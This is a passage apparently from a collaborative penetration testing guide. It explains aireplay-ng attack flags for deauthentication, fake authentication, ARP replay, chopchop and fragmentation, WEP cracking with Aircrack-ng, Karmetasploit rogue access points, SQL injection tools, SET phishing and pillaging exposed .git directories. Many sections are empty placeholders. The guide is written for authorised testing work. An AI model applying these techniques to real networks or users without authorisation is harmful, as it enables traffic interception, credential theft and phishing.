-a 34:EF:44:BB:14:C1 is the MAC address of the access point

-c 00:E0:4C:6D:27:8D is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated

wlan0 is the interface name

Screenshot Here

The fake authentication attack allows you to perform the two types of WEP authentication (Open System and Shared Key) and to associate with an AP. This attack is useful in scenarios where there are no associated clients. Note that fake authentication attacks do not generate ARP packets.

-1 means fake authentication

0 reassociation timing in seconds

-e 2WIRE696 is the wireless network name

-a 34:EF:44:BB:14:C1 is the access point MAC address

-h 00:E0:4C:6D:27:8D is our card MAC address

wlan0 is the wireless interface name

Screenshot Here

The classic ARP request replay attack is the most effective way to generate new initialization vectors. This attack is probably the most reliable of all. The program listens for an ARP packet then retransmits it back to the AP. This, in turn causes the AP to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the AP has a new IV. The collection of these IVs will later help us later in determining the WEP key.

-3 means standard arp request replay

-b 34:EF:44:BB:14:C1 is the access point MAC address

-h 00:E0:4C:6D:27:8D is the source MAC address (either an associated client or from fake authentication)

wlan0 is the wireless interface name

Attack 4 – KoreK chopchop

-4 means the chopchop attack

-b 34:EF:44:BB:14:C1 is the access point MAC address

-h 00:E0:4C:6D:27:8D is the source MAC address (either an associated client or from fake authentication)

wlan0 is the wireless interface name

Attack 5 – Fragmentation Attack

-5 means run the fragmentation attack

-b 34:EF:44:BB:14:C1 is the access point MAC address

-h 00:E0:4C:6D:27:8D is the source MAC address (either an associated client or from fake authentication)

wlan0 is the wireless interface name

Attack 9: Injection test

Where:

-9 – Injection test.

wlan0 – the interface name

Screenshot Here

Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program. Aircrack-ng can recover the WEP key once enough encrypted packets have been captured with airodump-ng. This part of the Aircrack-ng suite determines the WEP key using two fundamental methods. The first method is via the PTW approach (Pyshkin, Tews, and Weinmann). The default cracking method is PTW.

Attacking the User

The Rules of Engagment (ROE) should be validated to ensure this is in-scope before conducting any attacks against the users

Karmetasploit Attacks

Karmetasploit is a modification of the KARMA to integrate it into Metasploit. Karmetasploit creates a working “evil” access point working that provides network services to an unsuspecting user. The services Karmetasploit provides include a DNS daemon that responds to all requests, a POP3 service, an IMAP4 service, a SMTP service, a FTP service, a couple of different SMB services, and a web service. All DNS lookups result in the IP address of the access point being returned, resulting in a blackhole effect for all email, web, and other network traffic.

The output of aireplay-ng should indicate that injection is working and that one of the local access points could be reached. If every access point returns 0% and the message indicating injection is working is not there, you likely need to use a different/patched driver or a different wireless card.

Once the DHCP server has been installed, an appropriate configuration file needs to be created. This file is normally called “dhcpd.conf” or “dhcpd3.conf” and resides in /etc, /etc/dhcp, or /etc/dhcp3. The example below uses the 10.0.0.0/24 network with the access point configured at 10.0.0.1.

To run Karmetasploit, there are three things that need to happen. First, airbase-ng must be started and configured as a greedy wireless access point. The following example will beacon the ESSID of the target company, respond to all probe requests, and rebroadcast all probes as beacons for 30 seconds:

Second, we need to configure the IP address of the at0 interface to match.

Third, the DHCP server needs to be started on the “at0” TUN/TAP interface created by airbase-ng:

Finally, the Metasploit Framework itself needs to be configured. While its possible to configure each service by hand, its more efficient to use a resource file with the msfconsole interface. A sample resource file, configured to use 10.0.0.1 as the access point address, with nearly every feature enabled, can be downloaded here [2]. To use this resource file, run msfconsole with the -r parameter. Keep in mind that msfconsole must be run as root for the capture services to function.

Once the Metasploit Framework processes the commands in the resource file, the standard msfconsole shell will be available for commands. As clients connect to the access point and try to access the network, the service modules will do what they can to extract information from the client and exploit browser vulnerabilities.

DNS Requests

<Contribution Needed>

Bluetooth

<Contribution Needed>

Personalized Rogue AP

<Contribution Needed>

DoS / Blackmail angle

Web

A web application involves a web server that accepts input and is most often interfaced using http(s). The penetration tester’s goal is to discover any interaction points that can be manipulated to access information, functionality or services beyond the web applications intended use. Quite often a web application will comprise of tiers. The tiers are generally broken up into web, application, and data. These tiers can run on one or more servers, and any of the tiers may be load balanced across multiple servers. In the quest to find all the entry points, during the intelligence gathering and vulnerability analysis phase the penetration tester will utilize mostly GET and POST requests but should also test head, put, delete, trace, options, connect and patch. The objective is to map all input and output points. These are not limited to simply forms on a page, but include cookies, links, hidden forms, http parameters, etc. During the exploration particular attention should be given to sessions, cookies, error pages, http status codes, indirectly accessible pages, encryption usage and server configuration, dns and proxy cache usage. Ideally, this will be done using both automated and manual methods to discover potential ways to manipulate the web application parameters or logic. This is generally done using some form of client application (browser) and a proxy that can sit between the client application and the web application, and a tool to crawl (aka spider) through page links.

SQL Injection (SQLi)

According to OWASP (https://www.owasp.org/index.php/SQL_Injection) SQL Injection, or as it is more commonly known SQLi, consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

What is injection? Simply stated, SQL injection exploits a vulnerability that allows data sent to an application to be interpreted and run as SQL commands.

A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. SQL injection is typically discovered in the Vulnerability Analysis phase (and maybe hinted at in the intelligence gathering phase) of the engagement.

Several tools are available for the identification and exploitation of SQLi

Havij (http://itsecteam.com/en/projects/project1.htm)

SQLmap (http://sqlmap.sourceforge.net)

The Mole (http://sourceforge.net/projects/themole)

Pangolin (http://nosec.org/en/productservice/pangolin)

XSS

<Contribution Needed>

CSRF

<Contribution Needed>

Ad-Hoc Networks

<Contribution Needed>

Information Leakage

Detection bypass

<Contribution Needed>

FW/WAF/IDS/IPS Evasion

Human Evasion

DLP Evasion

Resistance of Controls to attacks

<Contribution Needed>

Type of Attack

<Contribution Needed>

Client Side

Phishing (w/pretext)

Service Side

Out of band

Post-Exploitation

Infrastructure analysis

The Social-Engineer Toolkit

The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of pentesting. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed. Currently SET has two main methods of attack, one is utilizing Metasploit payloads and Java-based attacks by setting up a malicious website (which you can clone whatever one you want) that ultimately delivers your payload. The second method is through file-format bugs and e-mail phishing. The second method supports your own open-mail relay, a customized sendmail open-relay, or Gmail integration to deliver your payloads through e-mail. The goal of SET is to bring awareness to the often forgotten attack vector of social-engineering. You can see detailed tutorials here or by downloading the user manual here.

High Value Files

Database Enumeration

Wifi

Add new Wifi entries with higher preference then setup AP to forceconnection

Check ESSIDs to identify places visited

Source Code Repos

<Contribution Needed>

SVN

CVS

MS Sourcesafe

WebDAV

Git

Git is a distributed version control system (DVCS) and the meta directory (.git) contains all the necessary information to re-create the state of the repository at any given point in time.

Identify the repo

Note: the .git directory is not always present in the root, but sometimes in sub directories depending on how a part of the application is deployed. Something like http://example.com/blog/.git/

If an error like this is the result of the clone attempt then you have to resort to pillaging in different ways as the repo is not easily cloneable.

Check for directory browsing

Example:

Other useful data

.git/index

“The index is a binary file (generally kept in .git/index) containing a sorted list of path names, each with permissions and the SHA1 of a blob object; git ls-files can show you the contents of the index:” (http://book.git-scm.com/7_the_git_index.html)